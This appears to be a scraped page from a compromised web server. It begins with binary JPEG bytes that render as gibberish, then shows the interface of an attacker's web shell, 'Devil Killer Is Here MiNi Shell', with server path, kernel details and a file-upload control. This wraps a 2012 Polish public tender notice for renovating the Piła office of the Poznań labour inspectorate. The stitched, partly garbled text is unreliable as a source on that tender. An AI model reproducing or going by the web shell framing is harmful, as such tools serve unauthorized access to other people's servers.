JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120807/289514-N-2012.html

<p class="kh_header"><b>Poznań: Remont pomieszczeń budynku siedziby Oddziału OIP Poznań w Pile przy ul. Dzieci Polskich 26</b><br>
<b>Numer ogłoszenia: 289514 - 2012; data zamieszczenia: 07.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Inspekcja Pracy - Okręgowy Inspektorat Pracy , ul. św. Marcin 46/50, 61-807 Poznań, woj. wielkopolskie, tel. 061 8599000, faks 061 8599003.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poznan.oip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń budynku siedziby Oddziału OIP Poznań w Pile przy ul. Dzieci Polskich 26.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac remontowych w pomieszczeniach budynku Państwowej Inspekcji Pracy w Pile przy ul. Dzieci Polskich 26, zakresem  obejmujących:

A) Branża budowlana: 
a) Wyburzenia i demontaż
- wyburzenia ścianek działowych w zespole sanitariatów pom. nr 9 i 10,
- demontaż drzwi wewnętrznych wraz z futrynami,
- demontaż zestawu drzwiowego DZ
- demontaż wykładziny podłogowej z PCV,
- demontaż płytek gresowych podłogowych,
- demontaż płytek ceramicznych ściennych w pom. nr 9,10, 23, 24,
- wyburzenia w celu poszerzenia otworów drzwiowych,
- demontaż karniszy ( 2 szt.).

b) Ściany wewnętrzne i działowe
- nowoprojektowane ściany w sanitariatach murowane z pustaka lekkiego typu SUPOREX o gr. 10cm, ściana na pełną wysokość pomieszczenia.
- Zablendowanie istniejących otworów drzwiowych ( 2 szt. ) w zabudowie typu lekkiego, ścianka o gr. 10cm z płyty G.-K. na stelażu stalowym wypełniona wełną mineralną akustyczną.
- wykonanie nowoprojektowanej ścianki działowej wydzielającej pomieszczenie serwerowni z płyty GKF x2 
o odporności ogniowej EI60, na stelażu stalowym, wypełnienie wełną mineralną akustyczną.

d) Wykończenie ścian i sufitu
- Istniejące ściany murowane: szpachlowanie i gruntowanie, malowanie farbą emulsyjną x2
- Ściany korytarza oraz wskazana ściana w pom. nr 18 wykończyć w tynku dekoracyjnym 
- W sanitariatach i pomieszczeniu porządkowym ściany wykończyć w płytkach ceramicznych
- malowanie sufitu farbą emulsyjną w kolorze białym x 2

e) Posadzki
- Korytarz i sanitariaty - Płytki gresowe antypoślizgowe półpoler gres szkliwiony
- W sanitariatach pod okładzinami z płytek ściennych oraz z płytek posadzkowych wykonać przeciwwodną izolację powłokową z wklejeniem taśm narożnikowych, 
- Pomieszczenie socjalne i porządkowe - płytki gresowe antypoślizgowe, do stosowania w obiektach użyteczności publicznej,
-  Pomieszczenia biurowe - wykładzina PCV antypoślizgowa, posiadająca atest do stosowania w obiektach użyteczności publicznej, wykładzina z cokołem wywiniętym na ścianę.
Przed ułożeniem wykładziny PCV wykonać wylewkę wyrównawczą na istniejącym podłożu z masy samopoziomującej o grub. 3-5mm w celu wyrównania podłoża. Należy usunąć wszelkie niedokładności posadzki. Podłoża porowate należy przeszlifować. Przed wylaniem masy niwelującej należy zastosować środek gruntujący (Unigrunt).


f) Stolarka drzwiowa
- zestaw drzwiowy DZ drzwi wewnętrzne aluminiowe o odporności ogniowej EI30, z samozamykaczem, wypełnienie przestrzeni nad zestawem zablendować płytą G.-K.Fire na stelażu stalowym, obustronnie mocowaną. 
- Drzwi wewnętrzne wraz z futryną D1 - płytowe, pełne, bezprzylgowe, profil krawędzi skrzydła (K)
Klamki gałkowe od strony korytarza. Klamki standardowe od strony pomieszczeń.
- Drzwi do sanitariatów D2 - j.w. z podcięciem dla wentylacji, nawiewu powietrza. Klamki standardowe obustronnie.
- Drzwi D3 - płytowe, pełne, w okleinie typu CPL HQ, o odporności pożarowej EI30.
- Drzwi D4 i D5 do kabin ustępowych - systemowe z płyty HPL, wysokość musi być dopasowana do poziomu ułożenia płytek ceramicznych na ścianach i futryny drzwiowej.
- Drzwi D6 - drzwi dwuskrzydłowe o odporności ogniowej EI30, z samozamykaczem, przeszklone, jedno skrzydło o szer. światła przejścia 90cm. 
- Drzwi D7 - drzwi dwuskrzydłowe, w tym jedno skrzydło o szer. światła przejścia min.90cm przeszklone, 
z samozamykaczem. Zamek na klucz i cyfrowy domofon w celu wydzielenia strefy bezpieczeństwa.

g) Nadproża 
Zaprojektowano nadproża z belek stalowych ( 4 szt.) w miejscu wykuwanych otworów drzwiowych - 
w istniejących ścianach nośnych. Szczegóły na rysunkach budowlanych.
W ścianach nośnych dla nowych otworów zaprojektowano nadproża z belek stalowych, z dwóch ceowników C140, o długości 1,2m.

h) uszczelnienie kominów: Zlokalizować miejsca przecieków przy kominach na dachu. Wykonać nowe uszczelnienie z papy termozgrzewalnej wywiniętej na ściany kominów.

i) Wyposażenie sanitariatów
Projektuje się miski ustępowe wiszące mocowane na stelażu stalowym systemowym. Stelaż obudować płytą G-K do wysokości 1,00m z półką. (Biały montaż) wg projektu branżowego instalacje sanitarne. Piony kanalizacyjne w sanitariatach i w pom. gospodarczym obudować płytą G-K.

j) Wentylacja grawitacyjna i mechaniczna
W razie konieczności udrożnienie istniejących przewodów wentylacyjnych. Istniejące kratki do
demontażu i montaż nowych wg projektu branży sanitarnej. W sanitariatach i w pomieszczeniu gospodarczym projektowana wentylacja mechaniczna wspomagana wywiewna - wg projektu branży instalacje sanitarne.

k) Żaluzje wewnętrzne: Montaż nowych żaluzji aluminiowych we wszystkich pomieszczeniach z oknami z wyjątkiem ciągów komunikacji ogólnej.

l) Krata okienna antywłamaniowa stalowa zewnętrzna: Mocowanie w szpaletach okiennych - w pomieszczeniu serwerowni.

B) Branża elektryczna
- demontaż istniejącego osprzętu elektroinstalacyjnego gniazd zasilających 230 VAC i łączników oświetlenia pomieszczeń;
- montaż nowoprojektowanego osprzętu elektroinstalacyjnego gniazd zasilających 230 VAC i łączników oświetlenia pomieszczeń;
- zasilanie obwodów nowoprojektowanych klimatyzatorów;
- zasilanie obwodu nowoprojektowanej szafy GPD;
- zasilanie obwodu nowoprojektowanej centrali telefonicznej;
- zasilanie obwodów nowoprojektowanych wentylatorów mechanicznych;
- demontaż istniejącego osprzętu gniazd abonenckich sieciowych i telefonicznych oraz koryt instalacyjnych;
-montaż nowoprojektowanego osprzętu gniazd abonenckich sieciowych i telefonicznych w wykonaniu p.t.;
-wykonanie instalacji okablowania strukturalnego jako p.t.;
- podłączenia okablowania strukturalnego do centrali telefonicznej i GPD;

Zakres szczegółowy robót i ich kolejność.
Instalacja zasilania gniazd 230 VAC:
-Odcięcie zasilania elektrycznego do poszczególnych obwodów gniazd 230 VAC,
- Demontaż osprzętu elektroinstalacyjnego gniazd 230 VAC,
- Montaż nowego osprzętu elektroinstalacyjnego gniazd 230 VAC,
Instalacja oświetleniowa:
- Odcięcie zasilania elektrycznego do poszczególnych obwodów opraw oświetleniowych,
- Demontaż osprzętu elektroinstalacyjnego łączników oświetlenia,
- Montaż nowego osprzętu elektroinstalacyjnego łączników oświetlenia,
- Zmiana lokalizacji łączników oświetlenia dla dwóch pomieszczeń,
- Podłączenia zasilania elektrycznego wentylatorów wyciągowych w trzech pomieszczeniach,
- Wydzielenie dodatkowego obwodu zasilania opraw oświetleniowych w jednym pomieszczeniu.
Instalacja zasilania urządzeń:
-Montaż obwodu zasilania elektrycznego centralki telefonicznej,
- Montaż obwodu zasilania elektrycznego szafy GPD - część B,
-Montaż obwodu zasilania elektrycznego jednostek klimatyzacji
Instalacja ochrony od porażeń obejmuje:
- oprzewodowanie o izolacji wzmocnionej (750V),
- stosowanie przewodów ochronnych PE,
- stosowanie ochronników przepięciowych (umieszczone w głównej rozdzielni - poza zakresem niniejszego opracowania, oprócz ochronnika typ 2 (klasa C) w szafie GPD - B),
- stosowanie wyłączników nadmiarowo-prądowych,
- stosowanie wyłączników różnicowo - prądowych (poza zakresem niniejszego opracowania, oprócz wył. różnicowo - prądowego w szafie GPD - B).
Pomiary elektryczne
Po zakończeniu robót dokonać pomiarów sprawdzających między innymi: rezystancji izolacji, skuteczności ochrony przeciwporażeniowej, pomiarów uziemień, pomiarów napięć i obciążeń, oraz tablic elektrycznych po ich wykonaniu. Przy niespełnieniu warunków pomiarów elektrycznych obwodów istniejących należy bezwzględnie instalacje elektryczne i obwody zasilania urządzeń elektrycznych wymienić na elementy nowe (poza zakresem niniejszego opracowania) i dostosować do wymogów obowiązujących norm i przepisów. Po montażu pomiary elektryczne wykonać powtórnie!!!

C)  Branża sanitarna 
- demontaż istniejących elementów instalacji sanitarnych - elementy odpowietrzające instalacji centralnego ogrzewania, armatura sanitarna, kratki wentylacyjne;
- montaż i podłączenia armatury sanitarnej do instalacji wod - kan;
- montaż kratek wentylacyjnych;
- montaż klimatyzatorów dla pomieszczeń biurowych i serwerowni;

Zakres szczegółowy robót i ich kolejność.
Instalacja centralnego ogrzewania:
- Odcięcie i obniżenia ciśnienia z obiegów modernizowanych istniejącej instalacji centralnego ogrzewania,
-Spuszczenie czynnika grzewczego z obiegów modernizowanych istniejącej instalacji centralnego ogrzewania,
-Demontaż układów odpowietrzających istniejącej instalacji centralnego ogrzewania, zaślepienie i wymagane prace modernizacyjne,
- Napełnienie instalacji c.o. wodą z sieci ciepłowniczej,
- Odpowietrzenie instalacji c.o.,
- Próba szczelności instalacji c.o..
Instalacja wod - kan:
- Odcięcie dopływu wody i spuszczenie ciśnienia do urządzeń sanitarnych,
- Demontaż armatury sanitarnej w pomieszczeniach sanitarnych i socjalnym,
- Demontaż istniejących podejść wodnych i kanalizacyjnych,
- Prace budowlane (poza zakresem opracowania),
- Wykonanie podejść wodnych i kanalizacyjnych do nowych urządzeń sanitarnych,
- Montaż urządzeń sanitarnych - biały montaż,
- Montaż przepływowych podgrzewaczy wody,
- Próba instalacji wodnej i kanalizacyjnej,
- Regulacja przepływów wody ciepłej w przepływowych podgrzewaczach wody.
Instalacja wentylacyjna:
- Demontaż kratek wentylacyjnych,
- Prace budowlane (poza zakresem opracowania),
- Montaż kratek wentylacyjnych.
Instalacja klimatyzacyjna:
- Montaż jednostek zewnętrznych klimatyzacji,
- Montaż jednostek wewnętrznych klimatyzacji,
- Połączenie instalacji czynnika chłodniczego,
- Odprowadzenie skroplin,
- Uruchomienie i regulacja klimatyzacji.

Założenia: 
- Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie z dokumentacją projektową (projekty prac remontowych, przedmiary robót, specyfikacje techniczne wykonania i odbioru robót budowlanych: branża architektura, instalacje sanitarne wewnętrzne oraz instalacje elektryczne 
i teletechniczne wewnętrzne). 
- Wykonawca zapewnienia materiały i urządzenia niezbędne do wykonania przedmiotu umowy, posiadające aktualne atesty i certyfikaty pozwalające na ich stosowanie. W trakcie realizacji robót na żądanie Zamawiającego dokumenty o których mowa powyższej mają być przedstawione Zamawiającemu w jego siedzibie, w terminie 3 dni od dnia otrzymania pisemnego wezwania do okazania przedmiotowych dokumentów.
-Transport materiałów na miejsce robót oraz dostarczenie i eksploatacja maszyn i urządzeń obciążają Wykonawcę. 
- Zamawiający informuje, że roboty mogą być wykonywane przez wszystkie dni tygodnia, w godzinach 7:00  - 18:00. 
- Wykonawca zabezpiecza teren robót mając w szczególności na względzie mienie Zamawiającego i własne, 
w szczególności Wykonawca zobowiązany jest na własny koszt zabezpieczyć zdemontowane urządzenia, sprzęt oraz materiały. 
- Wykonawca w trakcie wykonywania robót ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie miejsca robót z tytułu prowadzonych robót. 
- Wykonawca zobowiązany będzie do załatwienia wszystkich formalności związanych z realizacją zamówienia publicznego, ponieść koszty z nimi związane oraz dokonać wszystkich uzgodnień i ponieść ich koszty.
- Wykonawca poniesie koszty naprawy zniszczeń, których się dopuścił podczas wykonywania robót, które nie wynikają z zakresu robót.
- Wykonawca zapewnia we własnym zakresie wywóz i utylizację wszelkich odpadów budowlanych (śmieci, gruz i inne) oraz zobowiązuje się do gruntownego, całkowitego posprzątania pomieszczeń objętych remontem. 
- Po zakończeniu robót, ale przed ostatecznym odbiorem przez Zamawiającego Wykonawca zobowiązany jest do uporządkowania terenu budowy wraz z terenem przyległym i doprowadzenia ich do stanu jaki był przed rozpoczęciem robót.


 Szczegółowy opis przedmiotu zamówienia zawiera:
- specyfikacja techniczna wykonania i odbioru robót budowlanych - dla projektów wielobranżowych,   budowlano-wykonawczych - załącznik nr 8 do siwz,
- specyfikacja techniczna wykonania i odbioru robót budowlanych - instalacje sanitarne wewnętrzne - załącznik nr 8a do siwz,
- specyfikacja techniczna wykonania i odbioru robót budowlanych - instalacje elektryczne i teletechniczne wewnętrzne - załącznik nr 8b do siwz,
- przedmiar robót - branża budowlana - załącznik nr 9 do siwz,
- przedmiar robót - branża sanitarna -  załącznik nr 9a do siwz,
- przedmiar robót - branża elektryczna -  załącznik nr 9b do siwz,
- projekt wykonawczy - architektura wraz z rysunkami - załącznik nr 10 do siwz,
 - projekt wykonawczy - branża sanitarna wraz z rysunkami - załącznik nr 10a do siwz,
- projekt wykonawczy - branża elektryczna wraz z rysunkami - załącznik nr 10b do siwz,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.33.24.00-7, 45.33.23.00-6, 45.33.22.00-5, 45.33.12.21-1, 45.33.12.11-8, 45.33.00.00-9, 45.32.10.00-3, 45.31.10.00-0, 45.31.56.00-4, 45.31.53.00-1, 45.31.11.00-2, 45.31.11.00-1, 45.31.42.00-3, 45.31.43.20-0, 45.31.43.10-7, 45.31.41.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego warunku w tym zakresie i uzna warunek za spełniony, jesliwykonawca złoży oświadczenie o spełnieniu warunków udziału w postepowaniu, wzór którego stanowi załacznik nr 3 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W celu wykazania posiadania wiedzy i doświadczenia 
- wykaz co najmniej dwóch robót budowlanych odpowiadających rodzajowo przedmiotowi zamówienia, wykonanych na kwotę nie mniejszą niż 400.000 zł z podatkiem VAT każda, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty 
i miejsca wykonania, wykonanych zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych- załącznik nr 5 do siwz,
- referencje lub inny dokument potwierdzający, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

UWAGA: W przypadku podmiotów trzecich udostępniających zasoby Wykonawcy i jednocześnie biorących udział w realizacji części zamówienia podmioty te są zobowiązane do złożenia dokumentów potwierdzających brak podstaw do wykluczenia z postępowania określonych powyżej 
w VI.A 1-3 siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego warunku w tym zakresie i uzna warunek za spełniony, jesliwykonawca złoży oświadczenie o spełnieniu warunków udziału w postepowaniu, wzór którego stanowi załacznik nr 3 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - dysponować Kierownikiem Robót posiadającym uprawnienia budowlane w specjalności: konstrukcyjno -budowlanej a także instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, który będzie odpowiedzialny za kierowanie robotami budowlanymi a także kontrolowanie robót wraz z informacją na temat jego doświadczenia zawodowego, zakresu wykonywanych przez niego czynności, informacją o podstawie dysponowania tą osobą i posiadanych odpowiednich uprawnieniach budowlanych w zakresie kierowania robotami, z podaniem numeru tych uprawnień oraz przynależącego do właściwej Izby Samorządu Zawodowego - załącznik nr 7 do siwz
 W przypadku polegania na osobach zdolnych do wykonania zamówienia innego podmiotu pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów osobowych na okres korzystania z nich przy wykonywaniu zamówienia, w formie oryginału.
Oświadczenie o posiadaniu przez osoby uczestniczące w wykonywaniu zamówienia  odpowiednich uprawnień, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, zawarte w treści załącznika nr 7 do siwz.

Ilekroć zamawiający wymaga określonych uprawnień budowlanych ( w tym przynależności do określonego samorządu zawodowego) na podstawie aktualnie obowiązującej ustawy z dnia 07 lipca 1994 r. - prawo budowlane ( tekst jednolity Dz.U. z 2006 r. nr 156, poz. 1118 ze zm.) rozumie przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych 
w państwach członkowskich Unii Europejskiej ( Dz. U. z 2008 r. nr 63, poz. 394 ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego warunku w tym zakresie i uzna warunek za spełniony, jesliwykonawca złoży oświadczenie o spełnieniu warunków udziału w postepowaniu, wzór którego stanowi załacznik nr 3 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
